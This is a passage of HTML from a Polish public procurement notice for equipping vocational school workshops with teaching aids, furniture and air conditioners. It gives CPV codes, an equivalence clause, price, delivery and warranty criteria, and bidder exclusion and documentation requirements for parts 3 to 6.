innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CPV Oznaczenie według Wspólnego Słownika Zamówień ( kod CPV)<br/>39162100 – 6 Pomoce dydaktyczne<br/>39100000 – 3 Meble<br/>39290000 – 1 Wyposażenie różne<br/>39717200 – 3 Urządzenie klimatyzacyjne<br/>1. Przedmiotem zamówienia jest modernizacja / doposażenie pracowni w ZSP nr 2 i ZSP nr 4 w ramach projektu<br/>„ Młodzi rzemieślnicy razem dla pogranicza – rozwój transgranicznych kompetencji ”<br/>2. Szczegółowy opis przedmiotu zamówienia, opis wymagań zamawiającego w zakresie realizacji, odbioru, miejsca<br/>dostawy oraz warunki płatności określają :<br/>1) Szczegółowy opis przedmiotu zamówienia (SOPZ ), na który składa się :<br/>Załącznik nr 1.1. - Specyfikacja techniczna wyposażenia pracowni fryzjerskiej – meble ( dla Części nr 1 );<br/>Załącznik nr 1.2. - Specyfikacja techniczna wyposażenia pracowni fryzjerskiej ( dla Części nr 2 );<br/>Załącznik nr 1.3. - Specyfikacja techniczna wyposażenia pracowni mechanika pojazdów samochodowych –<br/>pomoce dydaktyczne ( dla Części nr 3);<br/>Załącznik nr 1.4. - Specyfikacja techniczna wyposażenia pracowni mechanika pojazdów samochodowych ( dla<br/>Części nr 4);<br/>Załącznik nr 1.5. - Specyfikacja techniczna wyposażenia pracowni gospodarki magazynowej( dla Części nr 5);<br/>Załącznik nr 1.6. - Specyfikacja techniczna wyposażenia - klimatyzatory ( dla Części nr 6);<br/>2) Projektowane postanowienia umowy – załącznik nr 4 do SWZ.<br/>3. Równoważność<br/>W przypadkach, kiedy w opisie przedmiotu zamówienia wskazane zostały znaki towarowe, patenty lub<br/>pochodzenia, źródła lub szczególny proces, który charakteryzuje produkty lub usługi dostarczane przez<br/>konkretnego Wykonawcę, oznacza to, że Zamawiający nie może opisać przedmiotu zamówienia w wystarczająco<br/>precyzyjny i zrozumiały sposób. W takich sytuacjach ewentualne wskazania na znaki towarowe, patenty,pochodzenie, źródło lub szczególny proces, należy odczytywać z wyrazami „lub równoważne”. Jeśli Zamawiający<br/>wskazał marki lub nazwy handlowe określa to klasę produktu, będącego przedmiotem zamówienia i służy<br/>ustaleniu standardu, a nie wskazuje na konkretny wyrób czy producenta.<br/>W sytuacjach, kiedy Zamawiający opisuje przedmiot zamówienia poprzez odniesienie się do norm, ocen<br/>technicznych, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt<br/>2 i ust. 3 ustawy Pzp, dopuszcza rozwiązania równoważne z opisywanym. Wykonawca, który oferuje rozwiązania<br/>równoważne do wskazanych norm jest obowiązany wykazać w ofercie, że oferowane przez niego dostawy<br/>spełniają wymagania określone przez Zamawiającego poprzez podanie nazwy oferowanego produktu, nazwy<br/>producenta i nr katalogowego bądź innych cech jednoznacznie wskazujących na zaoferowane produkty oraz<br/>dołączenie do oferty, w szczególności przedmiotowych środków dowodowych, o których mowa w art. 104-107<br/>ustawy Pzp, udowadniając, że proponowane rozwiązania w równoważnym stopniu spełniają wymagania<br/>określone w opisie przedmiotu zamówienia W przypadku, gdy Wykonawca nie złoży w ofercie dokumentów o<br/>zastosowaniu innych materiałów i urządzeń, to rozumie się przez to, że do kalkulacji ceny oferty oraz do<br/>wykonania umowy ujęto materiały i urządzenia zaproponowane w opisie przedmiotu zamówienia.<br/>W przypadku, gdy Zamawiający użył w opisie przedmiotu zamówienia normy, aprobaty, specyfikacje techniczne i<br/>systemy odniesienia, o których mowa w art. 101 ust. 4 ustawy Pzp należy rozumieć jako przykładowe.<br/>Zamawiający zgodnie z art. 101 ust. 4 ustawy Pzp dopuszcza w każdym przypadku zastosowanie rozwiązań<br/>równoważnych opisywanych w treści SWZ. Każdorazowo gdy wskazana jest w niniejszej SWZ lub załącznikach do<br/>SWZ norma, aprobata, specyfikacja techniczna lub system odniesienia należy przyjąć, że w odniesieniu do niej<br/>użyto sformułowania „lub równoważna”. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CPV Oznaczenie według Wspólnego Słownika Zamówień ( kod CPV)<br/>39162100 – 6 Pomoce dydaktyczne<br/>39100000 – 3 Meble<br/>39290000 – 1 Wyposażenie różne<br/>39717200 – 3 Urządzenie klimatyzacyjne<br/>1. Przedmiotem zamówienia jest modernizacja / doposażenie pracowni w ZSP nr 2 i ZSP nr 4 w ramach projektu<br/>„ Młodzi rzemieślnicy razem dla pogranicza – rozwój transgranicznych kompetencji ”<br/>2. Szczegółowy opis przedmiotu zamówienia, opis wymagań zamawiającego w zakresie realizacji, odbioru, miejsca<br/>dostawy oraz warunki płatności określają :<br/>1) Szczegółowy opis przedmiotu zamówienia (SOPZ ), na który składa się :<br/>Załącznik nr 1.1. - Specyfikacja techniczna wyposażenia pracowni fryzjerskiej – meble ( dla Części nr 1 );<br/>Załącznik nr 1.2. - Specyfikacja techniczna wyposażenia pracowni fryzjerskiej ( dla Części nr 2 );<br/>Załącznik nr 1.3. - Specyfikacja techniczna wyposażenia pracowni mechanika pojazdów samochodowych –<br/>pomoce dydaktyczne ( dla Części nr 3);<br/>Załącznik nr 1.4. - Specyfikacja techniczna wyposażenia pracowni mechanika pojazdów samochodowych ( dla<br/>Części nr 4);<br/>Załącznik nr 1.5. - Specyfikacja techniczna wyposażenia pracowni gospodarki magazynowej( dla Części nr 5);<br/>Załącznik nr 1.6. - Specyfikacja techniczna wyposażenia - klimatyzatory ( dla Części nr 6);<br/>2) Projektowane postanowienia umowy – załącznik nr 4 do SWZ.<br/>3. Równoważność<br/>W przypadkach, kiedy w opisie przedmiotu zamówienia wskazane zostały znaki towarowe, patenty lub<br/>pochodzenia, źródła lub szczególny proces, który charakteryzuje produkty lub usługi dostarczane przez<br/>konkretnego Wykonawcę, oznacza to, że Zamawiający nie może opisać przedmiotu zamówienia w wystarczająco<br/>precyzyjny i zrozumiały sposób. W takich sytuacjach ewentualne wskazania na znaki towarowe, patenty,pochodzenie, źródło lub szczególny proces, należy odczytywać z wyrazami „lub równoważne”. Jeśli Zamawiający<br/>wskazał marki lub nazwy handlowe określa to klasę produktu, będącego przedmiotem zamówienia i służy<br/>ustaleniu standardu, a nie wskazuje na konkretny wyrób czy producenta.<br/>W sytuacjach, kiedy Zamawiający opisuje przedmiot zamówienia poprzez odniesienie się do norm, ocen<br/>technicznych, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt<br/>2 i ust. 3 ustawy Pzp, dopuszcza rozwiązania równoważne z opisywanym. Wykonawca, który oferuje rozwiązania<br/>równoważne do wskazanych norm jest obowiązany wykazać w ofercie, że oferowane przez niego dostawy<br/>spełniają wymagania określone przez Zamawiającego poprzez podanie nazwy oferowanego produktu, nazwy<br/>producenta i nr katalogowego bądź innych cech jednoznacznie wskazujących na zaoferowane produkty oraz<br/>dołączenie do oferty, w szczególności przedmiotowych środków dowodowych, o których mowa w art. 104-107<br/>ustawy Pzp, udowadniając, że proponowane rozwiązania w równoważnym stopniu spełniają wymagania<br/>określone w opisie przedmiotu zamówienia W przypadku, gdy Wykonawca nie złoży w ofercie dokumentów o<br/>zastosowaniu innych materiałów i urządzeń, to rozumie się przez to, że do kalkulacji ceny oferty oraz do<br/>wykonania umowy ujęto materiały i urządzenia zaproponowane w opisie przedmiotu zamówienia.<br/>W przypadku, gdy Zamawiający użył w opisie przedmiotu zamówienia normy, aprobaty, specyfikacje techniczne i<br/>systemy odniesienia, o których mowa w art. 101 ust. 4 ustawy Pzp należy rozumieć jako przykładowe.<br/>Zamawiający zgodnie z art. 101 ust. 4 ustawy Pzp dopuszcza w każdym przypadku zastosowanie rozwiązań<br/>równoważnych opisywanych w treści SWZ. Każdorazowo gdy wskazana jest w niniejszej SWZ lub załącznikach do<br/>SWZ norma, aprobata, specyfikacja techniczna lub system odniesienia należy przyjąć, że w odniesieniu do niej<br/>użyto sformułowania „lub równoważna”. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CPV Oznaczenie według Wspólnego Słownika Zamówień ( kod CPV)<br/>39162100 – 6 Pomoce dydaktyczne<br/>39100000 – 3 Meble<br/>39290000 – 1 Wyposażenie różne<br/>39717200 – 3 Urządzenie klimatyzacyjne<br/>1. Przedmiotem zamówienia jest modernizacja / doposażenie pracowni w ZSP nr 2 i ZSP nr 4 w ramach projektu<br/>„ Młodzi rzemieślnicy razem dla pogranicza – rozwój transgranicznych kompetencji ”<br/>2. Szczegółowy opis przedmiotu zamówienia, opis wymagań zamawiającego w zakresie realizacji, odbioru, miejsca<br/>dostawy oraz warunki płatności określają :<br/>1) Szczegółowy opis przedmiotu zamówienia (SOPZ ), na który składa się :<br/>Załącznik nr 1.1. - Specyfikacja techniczna wyposażenia pracowni fryzjerskiej – meble ( dla Części nr 1 );<br/>Załącznik nr 1.2. - Specyfikacja techniczna wyposażenia pracowni fryzjerskiej ( dla Części nr 2 );<br/>Załącznik nr 1.3. - Specyfikacja techniczna wyposażenia pracowni mechanika pojazdów samochodowych –<br/>pomoce dydaktyczne ( dla Części nr 3);<br/>Załącznik nr 1.4. - Specyfikacja techniczna wyposażenia pracowni mechanika pojazdów samochodowych ( dla<br/>Części nr 4);<br/>Załącznik nr 1.5. - Specyfikacja techniczna wyposażenia pracowni gospodarki magazynowej( dla Części nr 5);<br/>Załącznik nr 1.6. - Specyfikacja techniczna wyposażenia - klimatyzatory ( dla Części nr 6);<br/>2) Projektowane postanowienia umowy – załącznik nr 4 do SWZ.<br/>3. Równoważność<br/>W przypadkach, kiedy w opisie przedmiotu zamówienia wskazane zostały znaki towarowe, patenty lub<br/>pochodzenia, źródła lub szczególny proces, który charakteryzuje produkty lub usługi dostarczane przez<br/>konkretnego Wykonawcę, oznacza to, że Zamawiający nie może opisać przedmiotu zamówienia w wystarczająco<br/>precyzyjny i zrozumiały sposób. W takich sytuacjach ewentualne wskazania na znaki towarowe, patenty,pochodzenie, źródło lub szczególny proces, należy odczytywać z wyrazami „lub równoważne”. Jeśli Zamawiający<br/>wskazał marki lub nazwy handlowe określa to klasę produktu, będącego przedmiotem zamówienia i służy<br/>ustaleniu standardu, a nie wskazuje na konkretny wyrób czy producenta.<br/>W sytuacjach, kiedy Zamawiający opisuje przedmiot zamówienia poprzez odniesienie się do norm, ocen<br/>technicznych, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt<br/>2 i ust. 3 ustawy Pzp, dopuszcza rozwiązania równoważne z opisywanym. Wykonawca, który oferuje rozwiązania<br/>równoważne do wskazanych norm jest obowiązany wykazać w ofercie, że oferowane przez niego dostawy<br/>spełniają wymagania określone przez Zamawiającego poprzez podanie nazwy oferowanego produktu, nazwy<br/>producenta i nr katalogowego bądź innych cech jednoznacznie wskazujących na zaoferowane produkty oraz<br/>dołączenie do oferty, w szczególności przedmiotowych środków dowodowych, o których mowa w art. 104-107<br/>ustawy Pzp, udowadniając, że proponowane rozwiązania w równoważnym stopniu spełniają wymagania<br/>określone w opisie przedmiotu zamówienia W przypadku, gdy Wykonawca nie złoży w ofercie dokumentów o<br/>zastosowaniu innych materiałów i urządzeń, to rozumie się przez to, że do kalkulacji ceny oferty oraz do<br/>wykonania umowy ujęto materiały i urządzenia zaproponowane w opisie przedmiotu zamówienia.<br/>W przypadku, gdy Zamawiający użył w opisie przedmiotu zamówienia normy, aprobaty, specyfikacje techniczne i<br/>systemy odniesienia, o których mowa w art. 101 ust. 4 ustawy Pzp należy rozumieć jako przykładowe.<br/>Zamawiający zgodnie z art. 101 ust. 4 ustawy Pzp dopuszcza w każdym przypadku zastosowanie rozwiązań<br/>równoważnych opisywanych w treści SWZ. Każdorazowo gdy wskazana jest w niniejszej SWZ lub załącznikach do<br/>SWZ norma, aprobata, specyfikacja techniczna lub system odniesienia należy przyjąć, że w odniesieniu do niej<br/>użyto sformułowania „lub równoważna”. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CPV Oznaczenie według Wspólnego Słownika Zamówień ( kod CPV)<br/>39162100 – 6 Pomoce dydaktyczne<br/>39100000 – 3 Meble<br/>39290000 – 1 Wyposażenie różne<br/>39717200 – 3 Urządzenie klimatyzacyjne<br/>1. Przedmiotem zamówienia jest modernizacja / doposażenie pracowni w ZSP nr 2 i ZSP nr 4 w ramach projektu<br/>„ Młodzi rzemieślnicy razem dla pogranicza – rozwój transgranicznych kompetencji ”<br/>2. Szczegółowy opis przedmiotu zamówienia, opis wymagań zamawiającego w zakresie realizacji, odbioru, miejsca<br/>dostawy oraz warunki płatności określają :<br/>1) Szczegółowy opis przedmiotu zamówienia (SOPZ ), na który składa się :<br/>Załącznik nr 1.1. - Specyfikacja techniczna wyposażenia pracowni fryzjerskiej – meble ( dla Części nr 1 );<br/>Załącznik nr 1.2. - Specyfikacja techniczna wyposażenia pracowni fryzjerskiej ( dla Części nr 2 );<br/>Załącznik nr 1.3. - Specyfikacja techniczna wyposażenia pracowni mechanika pojazdów samochodowych –<br/>pomoce dydaktyczne ( dla Części nr 3);<br/>Załącznik nr 1.4. - Specyfikacja techniczna wyposażenia pracowni mechanika pojazdów samochodowych ( dla<br/>Części nr 4);<br/>Załącznik nr 1.5. - Specyfikacja techniczna wyposażenia pracowni gospodarki magazynowej( dla Części nr 5);<br/>Załącznik nr 1.6. - Specyfikacja techniczna wyposażenia - klimatyzatory ( dla Części nr 6);<br/>2) Projektowane postanowienia umowy – załącznik nr 4 do SWZ.<br/>3. Równoważność<br/>W przypadkach, kiedy w opisie przedmiotu zamówienia wskazane zostały znaki towarowe, patenty lub<br/>pochodzenia, źródła lub szczególny proces, który charakteryzuje produkty lub usługi dostarczane przez<br/>konkretnego Wykonawcę, oznacza to, że Zamawiający nie może opisać przedmiotu zamówienia w wystarczająco<br/>precyzyjny i zrozumiały sposób. W takich sytuacjach ewentualne wskazania na znaki towarowe, patenty,pochodzenie, źródło lub szczególny proces, należy odczytywać z wyrazami „lub równoważne”. Jeśli Zamawiający<br/>wskazał marki lub nazwy handlowe określa to klasę produktu, będącego przedmiotem zamówienia i służy<br/>ustaleniu standardu, a nie wskazuje na konkretny wyrób czy producenta.<br/>W sytuacjach, kiedy Zamawiający opisuje przedmiot zamówienia poprzez odniesienie się do norm, ocen<br/>technicznych, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt<br/>2 i ust. 3 ustawy Pzp, dopuszcza rozwiązania równoważne z opisywanym. Wykonawca, który oferuje rozwiązania<br/>równoważne do wskazanych norm jest obowiązany wykazać w ofercie, że oferowane przez niego dostawy<br/>spełniają wymagania określone przez Zamawiającego poprzez podanie nazwy oferowanego produktu, nazwy<br/>producenta i nr katalogowego bądź innych cech jednoznacznie wskazujących na zaoferowane produkty oraz<br/>dołączenie do oferty, w szczególności przedmiotowych środków dowodowych, o których mowa w art. 104-107<br/>ustawy Pzp, udowadniając, że proponowane rozwiązania w równoważnym stopniu spełniają wymagania<br/>określone w opisie przedmiotu zamówienia W przypadku, gdy Wykonawca nie złoży w ofercie dokumentów o<br/>zastosowaniu innych materiałów i urządzeń, to rozumie się przez to, że do kalkulacji ceny oferty oraz do<br/>wykonania umowy ujęto materiały i urządzenia zaproponowane w opisie przedmiotu zamówienia.<br/>W przypadku, gdy Zamawiający użył w opisie przedmiotu zamówienia normy, aprobaty, specyfikacje techniczne i<br/>systemy odniesienia, o których mowa w art. 101 ust. 4 ustawy Pzp należy rozumieć jako przykładowe.<br/>Zamawiający zgodnie z art. 101 ust. 4 ustawy Pzp dopuszcza w każdym przypadku zastosowanie rozwiązań<br/>równoważnych opisywanych w treści SWZ. Każdorazowo gdy wskazana jest w niniejszej SWZ lub załącznikach do<br/>SWZ norma, aprobata, specyfikacja techniczna lub system odniesienia należy przyjąć, że w odniesieniu do niej<br/>użyto sformułowania „lub równoważna”. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie wstępne, o którym mowa w art. 125 ust. 1 ustawy Pzp, w celu potwierdzenia :<br/>- braku podstaw do wykluczenia z postępowania zawierające m.in.:<br/>Oświadczenie uwzględniające przesłanki z art. 7 ust 1 ustawy (…) w zakresie przeciwdziałania wspierania<br/>agresji na Ukrainę<br/>Oświadczenie dot. przesłanek z art. 5k rozp. 833/2014 .<br/>zgodnie z załącznikiem nr 3 do SWZ<br/>Uwaga:<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, lub korzystania z zasobów podmiotu<br/>udostępniającego swoje zasoby, oświadczenie o niepoleganiu wykluczeniu składa każdy z Wykonawców;<br/>3) Odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności<br/>Gospodarczej lub innego właściwego rejestru.<br/>Wykonawca nie jest zobowiązany do złożenia ww. dokumentów, jeżeli zamawiający może je uzyskać za<br/>pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskazał dane umożliwiające dostęp do<br/>tych dokumentów.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Formularz cenowo - asortymentowy – odpowiednio dla części, na którą składana jest oferta: Dla części 1 -<br/>załącznik nr 2.1. do SWZ; Dla części 2 – załącznik nr 2.2. do SWZ; Dla części 3 – załącznik nr 2.3. do SWZ; Dla<br/>części 4– załącznik nr 2.4. do SWZ; Dla części 5 – załącznik nr 2.5. do SWZ; Dla części 6 – załącznik nr 2.6. do<br/>SWZ.<br/>) Pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań w imieniu Wykonawcy – jeżeli<br/>ofertę składa pełnomocnik,<br/>5) Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie;<br/>Pełnomocnictwo do złożenia oferty musi być złożone w oryginale w takiej samej formie, jak składana oferta (tj.<br/>w formie elektronicznej). Dopuszcza się także złożenie elektronicznej kopii (skanu) pełnomocnictwa<br/>sporządzonego uprzednio w formie pisemnej, w formie elektronicznego poświadczenia sporządzonego stosownie do art. 97 § 2 ustawy z dnia 14 lutego 1991 r. - Prawo o notariacie, które to poświadczenie notariusz opatruje kwalifikowanym podpisem elektronicznym, bądź też poprzez opatrzenie skanu pełnomocnictwa sporządzonego uprzednio w formie pisemnej kwalifikowanym podpisem mocodawcy. Elektroniczna kopia pełnomocnictwa nie może być uwierzytelniona przez upełnomocnionego. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie<br/>zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia składa każdy z<br/>Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego<br/>wynika, które usługi wykonają poszczególni wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z<br/>Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach<br/>określonych we Wzorze Umowy, stanowiącym Załącznik nr 4 do SWZ.<br/>2. Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego 